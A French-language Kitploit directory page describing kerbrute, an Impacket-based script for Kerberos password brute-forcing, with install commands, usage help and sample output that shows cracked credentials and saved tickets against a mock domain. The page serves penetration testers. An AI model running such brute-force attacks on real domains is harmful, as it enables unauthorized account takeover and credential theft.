Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
kerbrute — Un script pour effectuer une attaque par force brute Kerberos en utilisant Impacket | Kitploit
Outils/GitHubGitHub/tarlogicsecurity/kerbrute
Attaques de Mots de PasseTests d'IntrusionAuthentification
GitHubtarlogicsecurity/kerbrute

kerbrute

Un script pour effectuer une attaque par force brute Kerberos en utilisant Impacket

Voir le dépôt
45777il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

kerbrute

Un script pour effectuer du bruteforcing Kerberos en utilisant la bibliothèque Impacket.

Lorsqu'il est exécuté, il reçoit en entrée un utilisateur ou une liste d'utilisateurs et un mot de passe ou une liste de mots de passe. Ensuite, il effectue une attaque par force brute pour énumérer :

  • Paires nom d'utilisateur/mot de passe valides
  • Noms d'utilisateur valides
  • Noms d'utilisateur sans pré-authentification requise

En conséquence, le script génère une liste des identifiants valides découverts, et les TGT générés grâce à ces identifiants valides.

Installation

Depuis pypi :

root@kitploit:~
pip3 install kerbrute

Depuis le dépôt :

root@kitploit:~
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt

Utilisation

Aide sans arguments :

root@kitploit:~
root@kali:~# kerbrute
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
                   [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
                   [-dc-ip <ip_address>] [-threads THREADS]
                   [-outputfile OUTPUTFILE] [-no-save-ticket]

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -user USER            User to perform bruteforcing
  -users USERS          File with user per line
  -password PASSWORD    Password to perform bruteforcing
  -passwords PASSWORDS  File with password per line
  -domain DOMAIN        Domain to perform bruteforcing
  -dc-ip <ip_address>   IP Address of the domain controller
  -threads THREADS      Number of threads to perform bruteforcing. Default = 1
  -outputfile OUTPUTFILE
                        File to save discovered user:password
  -no-save-ticket       Do not save retrieved TGTs with correct credentials

Exemples : 
	./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com

Exemple d'exécution :

root@kitploit:~
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Stupendous => triceratops:Sh4rpH0rns
[*] Saved TGT in triceratops.ccache
[*] Valid user => velociraptor [NOT PREAUTH]
[*] Valid user => trex
[*] Saved discovered passwords in jurassic_passwords.txt
Télécharger l’outil